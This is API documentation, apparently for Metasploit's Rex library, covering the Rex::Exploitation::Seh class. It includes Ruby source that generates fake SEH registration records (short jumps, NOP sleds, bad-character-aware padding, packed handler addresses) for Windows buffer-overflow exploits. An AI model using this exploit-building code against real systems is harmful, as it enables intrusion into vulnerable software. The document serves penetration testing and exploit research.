Class: Rex::Exploitation::Seh

Inherits:

Object

• Object
• Rex::Exploitation::Seh

Defined in:

lib/rex/exploitation/seh.rb

Overview

This class provides methods for generating SEH registration records in a dynamic and flexible fashion. The records can be generated with the short jump at a random offset into the next pointer and with random padding in between the handler and the attacker’s payload.

Instance Method Summary

• #generate_dynamic_seh_record(handler) ⇒ Object

  Generates a fake SEH registration record with the supplied handler address for the handler, and a nop generator to use when generating padding inside the next pointer.

• #generate_seh_record(handler, dynamic = false) ⇒ Object

  Generates an SEH record.

• #generate_static_seh_record(handler) ⇒ Object

  Generates a static SEH registration record with a specific handler and next pointer.

• #initialize(badchars = nil, space = nil, nop = nil) ⇒ Seh constructor

  Creates a new instance of the class and initializes it with the supplied bad character list.

Constructor Details

#initialize(badchars = nil, space = nil, nop = nil) ⇒ Seh

Creates a new instance of the class and initializes it with the supplied bad character list. The space argument denotes how much room is available for random padding and the NOP argument can be used to generate a random NOP sled that is better than 0x90.

# File 'lib/rex/exploitation/seh.rb', line 24

def initialize(badchars = nil, space = nil, nop = nil)
  self.badchars = badchars || ''
  self.space    = (space && space > 121) ? 121 : space
  self.nop      = nop
end

Instance Method Details

#generate_dynamic_seh_record(handler) ⇒ Object

Generates a fake SEH registration record with the supplied handler address for the handler, and a nop generator to use when generating padding inside the next pointer. The NOP generator must implement the ‘generate_sled’ method that takes a length and a list of bad characters.

# File 'lib/rex/exploitation/seh.rb', line 48

def generate_dynamic_seh_record(handler)

  # Generate the padding up to the size specified or 121 characters
  # maximum to account for the maximum range of a short jump plus the
  # record size.
  pad    = rand(space || 121)
  rsize  = pad + 8

  # Calculate the random index into the next ptr to store the short jump
  # instruction
  jmpidx = rand(3)

  # Build the prefixed sled for the bytes that come before the short jump
  # instruction
  sled = (nop) ? nop.generate_sled(jmpidx, badchars) : ("\x90" * jmpidx)

  # Seed the record and any space after the record with random text
  record = Rex::Text.rand_text(rsize, badchars)

  # Build the next pointer and short jump instruction
  record[jmpidx, 2] = Rex::Arch::X86.jmp_short((rsize - jmpidx) - 2)
  record[0, jmpidx] = sled

  # Set the handler in the registration record
  record[4, 4]      = [ handler ].pack('V')

  # Return the generated record to the caller
  record
end

#generate_seh_record(handler, dynamic = false) ⇒ Object

Generates an SEH record

# File 'lib/rex/exploitation/seh.rb', line 33

def generate_seh_record(handler, dynamic=false)
  if (dynamic)
    generate_dynamic_seh_record(handler)
  else
    generate_static_seh_record(handler)
  end
end

#generate_static_seh_record(handler) ⇒ Object

Generates a static SEH registration record with a specific handler and next pointer.

# File 'lib/rex/exploitation/seh.rb', line 82

def generate_static_seh_record(handler)
  "\xeb\x06" + Rex::Text.rand_text(2, badchars) + [ handler ].pack('V')
end